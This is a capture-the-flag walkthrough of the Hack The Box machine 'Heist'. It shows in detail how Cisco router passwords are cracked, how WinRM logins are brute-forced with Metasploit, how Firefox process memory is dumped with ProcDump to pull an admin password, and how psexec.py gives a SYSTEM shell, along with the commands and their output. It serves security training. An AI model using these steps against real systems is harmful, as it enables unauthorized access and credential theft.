HTB - Heist

Getting Root:
We gather a few creds from a cisco router configuration after login in as guest to the application on port 80
Enumerated the box using
enum4linux
,smbmap
andsmbclient
and was able to get two additional usersThe box has port 5985 opened so decided to test all users and passwords to see if any of the combination was successful and was able to get a shell.
On the privilege escalation, I was not able to get much from Watson, Sherlock, winPEAS, PowerUp All-Checks or basic manual enumeration. However I noticed the box had Firefox listed in the process list, therefore, i decided to do a process dump using the Microsoft Sysinternals.
After analyzing the output file from the dump, I was able to get the password from the Administrator and login using evil-winrm.
Nmap
nmap -p- 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:24 EDT
Nmap scan report for 10.10.10.149
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49668/tcp open unknown
nmap -sC -sV -p 80,135,445,5985,49668 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:27 EDT
Nmap scan report for 10.10.10.149
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 45s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-10T02:28:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.32 seconds
Enumerating SMB
I used smbmap
, smbclient
, enum4linux
and crackmapexec
and was not able to get anything.
Enumerating http
Gobuster
http://10.10.10.149:80/attachments (Status: 301) [Size: 158]
http://10.10.10.149:80/css (Status: 301) [Size: 150]
http://10.10.10.149:80/errorpage.php (Status: 200) [Size: 1240]
http://10.10.10.149:80/images (Status: 301) [Size: 153]
http://10.10.10.149:80/Images (Status: 301) [Size: 153]
http://10.10.10.149:80/index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/Index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/issues.php (Status: 302) [Size: 16]
http://10.10.10.149:80/js (Status: 301) [Size: 149]
http://10.10.10.149:80/login.php (Status: 200) [Size: 2058]
http://10.10.10.149:80/Login.php (Status: 200) [Size: 2058]
Going to http://10.10.10.149
redirects to http://10.10.10.149/login.php
. I tried admin/admin and a few other combinations but nothing worked. However there is a "Login as guest" button and I was bale to login.

There user Hazard has attached the configuration of a Cisco router.

The configuration of the Cisco router has some encrypted passwords and usernames.

Decrypting the Cisco Passwords

User: rout3r
Password: $uperP@ssword

User: admin
Password: Q4)sJu\Y8qz*A3?d
The enable secret: stealth1agent
Enumerating SMB Again
With the new credentials obtained I enumerated smb, using smbmap
, smbclient
, enum4linux
and crackmapexec
I was bale to get two additional usernames using enum4linux
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (Local User)
Using metasploit winrm_login
module to see to brute force creds. For some weird reason crackmapexec smb
and winrm
modules were not successful and were generating a lot of errors.
Enumerating winrm
I tried to brute force the winrm login creds with crackmapexec
using its winrm
module but it was failing, there I decided to sue metasploit winrm_login auxiliary module.
msf5 auxiliary(scanner/winrm/winrm_login) > run
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:$uperP@ssword (Incorrect: )
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:$uperP@ssword (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Using evil-winrm
# evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d"
Privilege Escalation
Checking the Processes
We notice that Firefox is running. We could use the process dump tool from Microsoft sysinternals to create dump of the processes.
C:\Users\Chase\documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1152 72 144940 183780 39.67 752 1 firefox
407 31 17372 62200 3.64 2280 1 firefox
343 19 10032 37420 1.03 2828 1 firefox
390 33 52028 84108 98.34 5996 1 firefox
358 26 16360 37764 0.63 6088 1 firefox
Using the Sysinternals Suite from Microsoft
The specific tool we are interested in is ProcDump.
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts.
Started with the first process which is using PID 752
C:\Users\Chase\documents> .\procdump64.exe -ma 752
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[02:50:41] Dump 1 initiated: C:\Users\Chase\documents\firefox.exe_200310_025041.dmp
[02:50:41] Dump 1 writing: Estimated dump file size is 484 MB.
[02:50:45] Dump 1 complete: 485 MB written in 3.6 seconds
[02:50:45] Dump count reached.
Transferred the file to my Kali box using evil-winrm
*Evil-WinRM* PS C:\Users\Chase\documents> download firefox.exe_200310_025041.dmp
Inspecting the file after transfer
# strings firefox.exe_200310_025041.dmp | grep -i password | more
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
Got some creds from the dump:
User: admin@support.htb
Password: 4dD!5}x/re8]FBuZ
Using evil-winrm to test those creds with the Administrator user confirms that was the correct password.
Got a shell as SYSTEM
psexec.py Administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file xvhnmTQR.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service lCrZ on 10.10.10.149.....
[*] Starting service lCrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
Last updated